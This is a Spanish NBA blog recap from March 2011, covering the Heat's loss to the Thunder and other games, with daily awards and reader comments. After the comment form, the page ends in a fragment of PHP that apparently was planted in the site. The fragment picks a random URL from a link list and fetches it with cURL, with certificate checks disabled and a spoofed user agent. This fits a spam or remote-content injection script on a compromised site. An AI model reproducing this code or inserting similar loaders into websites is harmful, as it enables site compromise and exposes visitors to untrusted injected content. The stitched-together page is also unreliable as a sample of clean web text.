La Crónica (16/03/2011)

17 de March de 2011 por TheDeerHunter

Se truncó la meteórica resurrección de los Heat. Anoche mordieron hueso duro con los Thunder, un equipo que sin hacer ruido se han posicionado para pelear nada menos la 2ª plaza del Oeste (96-85). No son casuales las 5 victorias consecutivas que acumulan y harán muy mal sus rivales si les subestiman en los cruces. Los Heat se dejaron la piel para doblegarles pero en pocos momentos dieron verdadera sensación de estar en condiciones serias de lograrlo. Durant le ganó a LeBron este duelo de super-aleros de la liga, Bosh sudó lo suyo contra Ibaka, y Wade, pasadísimo de vueltas, dejó anoche alguna de las acciones más espectaculares de la temporada. No os perdáis el vídeo.

Precisamente un ex-Thunder, Jeff Green, fue el mejor de los Celtics en su victoria contra Pacers y permite a su nuevo equipo tomar aire ante la presión a la que vienen siendo sometidos (80-92). El equipo de Vogel, bastante fallón, no fue capaz de aprovechar el gran dominio bajo los aros. Sufrirán los verdes si el líder reboteador tiene que ser Glen Davis. La recuperación de los pívots se antoja vital. En Indiana, a pesar de todos, se mantienen cómodos con su paupérrimo 29-39 en la 8ª plaza del Este. Si tienen que ser los Bobcats o los Bucks quien se la arrebaten lo tienen hecho. Los primeros se llevaron un palizón de Houston ante unos Rockets repletos de suplentes (78-94) y los segundos aun le plantaron algo de cara a Orlando, forzándoles la prórroga (93-89). Sin embargo perdieron, como casi siempre. El duelo Howard vs Larry Sanders puede ser uno de los más desequilibrados de la liga, sino el que más.

Otros dos que están muy cómodos en su plaza de playoffs son Atlanta y Denver. Anoche se enfrentaron resultando en  otra brillante victoria de los Nuggets (102-87). El small-ball de los Hawks esta vez fue un fracaso y muy mal lo tienen si el mejor es Pachulia. El equipo de George Karl es otra de las incógnitas en el Oeste. Peligrosísimos.

Volviendo al Oeste los Mavs recuperaron la 2ª plaza con una importantísima victoria en Oakland (112-106). Les costó muchísimo controlar el ataque de los Warriors y sólo un partido inmenso de Nowitzki y una gran contribución colectiva les salvó de un nuevo tropiezo. En cambio, los “Soletes” definitivamente parecen despedirse de sus opciones. La puntilla puede ser la decisiva derrota en el duelo directo contra Nueva Orleans (95-100). La producción de sus interiores titulares, Warrick y Lopez es para echarse a llorar. Demasiado regalo para lo que se estaban jugando. Utah, en cambio, se mantiene en la brecha gracias al partidazo de CJ Miles en la victoria frente a Minnesota (104-119).

Por último, en partidos más intrascendentes que otra cosa los Sixers no tuvieron problemas ante los Clippers (104-94), los Cavs ganaron en Sacramento (97-93) y los Pistons en Toronto (93-107).

PREMIOS

MVP: Puede parecer injusto no otorgar el mejor premio del día a un jugador que anota 40 puntos pero los 31 puntos, 22 rebotes, 2 robos y 3 tapones de Dwight Howard nos parecen una actuación mucho más espectacular. El destrozo en la zona de Milwaukee, aprovechando la baja de Bogut, fue considerable.

Rookie: Mientras Blake Griffin atraviesa su Rookie Wall, otros rookies destacan. Anoche Greg Monroe fue el mejor de los Pistons con 21 puntos, 10 rebotes y 5 asistencias.

Sorpresa: Ty Corbin decidió introducir a CJ Miles en el quinteto titular en detrimento de Raja Bell y la jugada no ha podido salirse mejor. 40 puntos de todos los colores. El jugador de los Jazz parecía infalible.

Decepción: Carlos Delfino no fue capaz de anotar ayer ninguno de los 7 lanzamientos que intentó pero de todas maneras no puedo resistirme a darle el premio a Rajon Rondo. El nivel del base de los Celtics es lo más preocupante de la franquicia verde. Anoche se quedó sin anotar tras fallar los 2 únicos tiros que llevó a cabo. Además, tampoco pilló un solo rebote. Impropio en él.

Esfuerzo en vano: Monta Ellis y lo suyos cayeron ante los Mavs a pesar de llegar a ir ganando de 18. Los 26 puntos, 6 rebotes y 11 asistencias del 8 de Golden State sirvieron sólo para sacar brillo al Box Score.

Imágenes | AP Photos / Getty Images

Comenta

5 comentarios a esta entrada

  1. Nacho dice:
    #1

    En la pelea por NO conseguir la 8ª del Este, Indiana, Charlotte y Millwake llevan tal ritmo, que como a Deron y a los suyos les de por seguir ganando (a ver si pueden hoy con los Bulls), es posible que lo consigan los tres.
    Si yo fuera Stern, el premio por ser primero en el Este conllevaría el pase automático a semis de conferencia. O para hacerlo más internacional que se la jugaran contra el ganador de la Final Four europea.
    Molaría una serie a 7 entre los Bulls y el Barcelona, por ejemplo.

      Citar

  2. GreenPride dice:
    #2

    Vuelta a la senda de la victoria para los Celtics. Ningún titular llegó a los 30 minutos en un partido más o menos plácido y volvió Delonte West. Falta hace para los verdes ahora que Rajon Rondo está atravesando un gran socavón en su juego. Prioridad número uno recuperarle de cara a playoffs así como necesidad imperiosa de recuperar a los O’Neal para no perder de forma descarada la lucha por el rebote. Si consiguen esas dos cosas los Celtics para mí favoritos del Este.
    Y favoritos porque esta vez los Heat volvieron a pegársela. Tras 3 victorias convincentes en las que parecían resucitar ayer su ataque volvió a hundirse y su defensa interior fue de chiste (Ibaka fenomenal). Durant ganó claramente su duelo con LeBron y Wade no tuvo su mejor día a pesar de un mate estratosférico y algunas acciones espectaculares. La duda es cuando falla el Big Three ¿Que hacer? La respuesta es nada, los Heat dependerán totalmente de su trío de ases si quieren intentar el asalto al anillo. Por lo Thunder, creo que el equipo gana mucho dando más minutos a Ibaka y con la presencia interior de Perkins y Mohamed en el puesto de 5. Ninguno de los 2 son jugadores de calidad pero ambos conocen su oficio, son buenos reboteadores y no hacen tonterías. Los Thunder, como los Nuggets y los Blazers equipos peligrosísimos de cara a los playoffs en el Oeste.

      Citar

  3. Sempren dice:
    #3

    Para small-ball el de Dallas, 35 minutos para Kidd, Beaubois y Terry, más otros 14 para Barea…

      Citar

  4. Len Bias dice:
    #4

    Veo que no se toma muy en cuenta a los Bulls, los veo infravalorados. En mi opinión estarán seguro en la final de conferencia, y no me extrañaría nada que llegasen a la final de la NBA.

      Citar

  5. CAMPO2 dice:
    #5

    Si la Regular durase 10 partidos mas si que entrarian los Nets en post-temporada, pero sintiendolo mucho se van a quedar cortos

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>